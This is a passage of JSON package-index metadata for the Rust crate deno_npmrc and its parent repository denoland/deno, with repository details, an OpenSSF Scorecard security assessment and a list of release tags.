.maven.org","url":"https://maven-central.storage-download.googleapis.com/maven2","ecosystem":"maven","default":true,"packages_count":620154,"maintainers_count":0,"namespaces_count":82381,"keywords_count":36851,"github":"maven-central","metadata":{"funded_packages_count":48065,"rate_limit":2},"icon_url":"https://github.com/maven-central.png","created_at":"2022-07-21T16:40:13.074Z","updated_at":"2026-09-01T05:04:44.165Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/namespaces"}},{"id":14107009,"name":"deno_npmrc","ecosystem":"cargo","description":"npm registry configuration (.npmrc) parser","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":18,"first_release_published_at":"2026-03-23T15:44:00.139Z","latest_release_published_at":"2026-08-06T11:46:15.490Z","latest_release_number":"0.18.0","last_synced_at":"2026-08-29T21:57:31.154Z","created_at":"2026-03-23T15:48:21.505Z","updated_at":"2026-08-30T02:55:30.378Z","registry_url":"https://crates.io/crates/deno_npmrc/","install_command":"cargo install deno_npmrc","documentation_url":"https://docs.rs/deno_npmrc/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-29T19:17:00.000Z","size":248743,"stargazers_count":108340,"open_issues_count":1540,"forks_count":6359,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-29T21:56:41.390Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-29T20:05:41.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36975782,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-08-29T02:00:05.978Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"